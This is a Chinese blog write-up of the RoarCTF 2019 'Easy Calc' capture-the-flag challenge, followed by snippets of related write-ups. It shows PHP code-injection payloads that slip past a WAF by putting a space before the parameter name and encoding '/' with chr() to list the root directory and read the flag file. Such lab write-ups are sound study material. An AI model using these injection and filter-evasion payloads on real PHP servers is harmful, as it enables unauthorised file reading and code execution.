BUU-WEB-[RoarCTF 2019]Easy Calc

最新推荐文章于 2024-02-12 15:18:56 发布
最新推荐文章于 2024-02-12 15:18:56 发布
阅读量130 收藏
点赞数
分类专栏: BUU-WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_24033605/article/details/116566626
版权

[RoarCTF 2019]Easy Calc

查看源码,发现有一段提示。
在这里插入图片描述
注释里显示,开启了WAF(web应用防护系统),但是通过源码审计并不能看出来。由于源码是php代码,猜测WAF也是使用php语言。假如waf不允许num变量传递字母,可以在num前加个空格,这样waf就找不到num这个变量了,因为现在的变量叫“ num”(此处num前有空格),而不是“num”。但php在解析的时候,会先把空格给去掉,这样我们的代码还能正常运行,还上传了非法字符。
利用scandir()尝试扫描根目录。

? num=1;var_dump(scandir("/"))

但是似乎"/"被过滤了无法执行,于是尝试使用chr(47)绕过。

? num=1;var_dump(scandir(chr(47)))

在这里插入图片描述
成功找到flag文件。
开始利用file_get_contents()得到flag文件的内容。

calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

在这里插入图片描述

flag{3a850a29-b65d-44e4-906a-9a5dbca93a2f}
TzZzEZ-web
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
最新发布
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
BUUCTF-web类-第六题 [RoarCTF 2019]Easy Calc
weixin_44622228的博客
04-17 399
BUUCTF-web类-第六题 [RoarCTF 2019]Easy Calc 进入靶场,发现只有一个计算器的页面, 输入1+2看看,返回了答案3 常规想法,输入单引号试试,弹出了一个窗口 经过多个字符测试,发现都会导致弹窗,这时候我们看看F12看看, 有一段注释说这题有WAF,那肯定思路就是如何绕过WAF拿到flag了 注释下还有一段js代码,通过代码可以发现还有个calc.php页面,于是...
BUU WEB [RoarCTF 2019]Easy Calc
star_feather的博客
01-26 272
打开网址,发现只有一个计算器,正常的计算是没有问题的,但一输入字符就会报错,查看源代码也没有任何收获,然后抓包瞅瞅,有意外收获: 得到了传参方式GET:/calc.php?num=1,还有一个文件calc.php,那就去看看吧: 这段代码交代出过滤了很多东西。 然后…我就抓瞎了,因为num不能传字符(运算符除外),就没法传进去命令参数什么的,再然后我就去找了题解,大佬们分享,这道题是出题人对PHP字符串解析漏洞的理解,需要了解一些前置知识: 我们知道PHP将查询字符串(在URL或正文中)转换为内部GET
buu web:[RoarCTF 2019]Easy Calc
m0_55378150的博客
04-12 113
打开靶机,可以看到是一个简单的计算功能 看一下源代码,发现了我看不懂的js代码 但是里面有说到一个calc.php,看一下里面有什么 soga,原来是waf,可以传入num参数,但是黑名单结合正则匹配过滤了不少字符,试了一下发现还不能是字母,最终可以通过eval函数执行命令。 没啥思路,去看一下别人的wp,原来可以用php字符串解析特性来绕过waf,就是可以在num前加个空格,变成“ num”,而不是“num”。但php在解析的时候,会先把空格给去掉,这样我们的代码还能正常运行,神奇
BUUCTF [RoarCTF 2019]Easy Calc1
lzu_lfl的博客
09-11 1397
BUUCTF [RoarCTF 2019]Easy Calc1 WP
BUUCTF WEB [RoarCTF 2019]Easy Calc(小宇特详解)
小宇的web博客
01-18 730
BUUCTF WEB [RoarCTF 2019]Easy Calc(小宇特详解) 打开网页后是这样的。 这里先查看一下源代码 这里显示是有waf的,直接访问一下calc.php来查看。 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n
BUUCTF WEB [RoarCTF 2019]Easy Calc
Y1da的博客
04-16 360
BUUCTF WEB [RoarCTF 2019]Easy Calc F12查看页面源代码 <!DOCTYPE html> <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>简单的计算器</title> <meta name="viewport" content="width=device
BUUCTF-[RoarCTF 2019]Easy Calc1
Monica的博客
09-20 585
目录 题目: 方法一: 知识点: 分析: 方法二 知识点: 题目: 页面应该是一个计算器,其他的没有什么发现,日常查看源代码: 访问calc.php,发现源码: <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', .
[RoarCTF 2019]Easy Calc
她叫常玉莹
09-16 958
查看源码发现calc.php文件 calc.php文件 本题考查PHP字符串解析漏洞 PHP将查询字符串(在URL或正文中)转换为内部GET或的关联数组_GET或的关联数组G​ET或的关联数组_POST。例如:/?foo=bar变成Array([foo] => “bar”)。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news[id%00=42会转换为Array([news_id] => 42) PHP将所有参数转换为有效的变量名 删除空白字符 将某
buu web [RoarCTF 2019]Easy Calc1
m0_62469575的博客
02-12 835
PHP的字符串解析特性:PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:1.删除空白符 2.将某些字符转换为下划线(包括空格)【当waf不让你过的时候,php却可以让你过】。但php在解析的时候,会先把空格给去掉,这样我们的代码还能正常运行,还上传了非法字符。PHP的字符串解析特性:PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:1.删除空白符 2.将某些字符转换为下划线(包括空格)【当waf不让你过的时候,php却可以让你过】。
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
Project-Decoder-Ring
03-27
项目解码器环 项目描述:解码器环 该应用程序具有3种不同的解码器。 1.凯撒密码是一种替换密码,其中明文中... 2.... 3.... “单位”可以是单个字母(最常见),成对的字母,字母的三元组,上述的混合形式,等等。... 屏幕截图:
BUU-WEB-[HCTF 2018]admin
qq_24033605的博客
05-09 7373
[HCTF 2018]admin方法一:flask session欺骗方法二:Unicode欺骗 主页标题有一个超链接,点击去看一看。 啥也没找到,于是返回主页查看源码。发现一个登录的链接和一个注册的链接。 尝试先注册一个测试账号。 注释里提示我们没用admin账户登录。 查看源码,发现提供了四个操作的链接。 想要获取admin的账户,只可能是从两个方面入手,一个是注册时修改admin密码,另一个就是通过修改密码,修改admin的密码。 change功能里的源码中,提供了一个github地址。
BUUCTF-[SCTF2019]Flag Shop
qq_24033605的博客
11-04 4372
[SCTF2019]Flag Shop 简单看一下几个按钮的作用,buy flag是购买flag的按钮,但是当前的JinKela不够买不起,reset是重置按钮,work是工作按钮,可以赚取JinKela,但是每次只能赚取一小部分。(除非你足够闲,一直点到所需的数量然后购买flag) 这三个按钮干不成大事,目录扫描,扫到robots.txt 查看页面备份文件 这里可以看到源码~~(本菜狗没学过Ruby,哭了)~~ 问题不大,看到了JWT,先抓个包看一下, 找到了jkl的位置,但是缺少密钥对其进行加
BUUCTF-[MRCTF2020]Ezaudit
qq_24033605的博客
11-04 3259
[MRCTF2020]Ezaudit 扫描目录,发现www.zip可以下载到源码。 进行部分审计, 只有当username,password和private_key全部正确时,才会获取flag。 对于username和password,由于是sql查询,可以万能密码进行绕过,剩下的问题是获取private_key。 给出了获取public_key和private_key的函数,并且mt_rand函数是伪随机函数,只要获取种子值就都不是问题。 接下来我们要根据public_key反推出种子值。 首先转换字
BUUCTF-[b01lers2020]Life on Mars
qq_24033605的博客
11-04 2940
[b01lers2020]Life on Mars 审视了一下页面的功能,这几个功能键只能改变页面显示,连跳转都没有。扫描了一下,没有其他任何页面。这是猜想是不是框架漏洞。 利用了Bootstrap的漏洞也没用,只能抓包看一下,不抓不知道,一抓吓一跳 找到了sql注入的注入点,测试了一下,似乎存在waf,不能有空格,于是常规用/**/替换空格。 爆破数据库名 union/**/select/**/1,group_concat(SCHEMA_NAME)/**/from/**/information_s
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值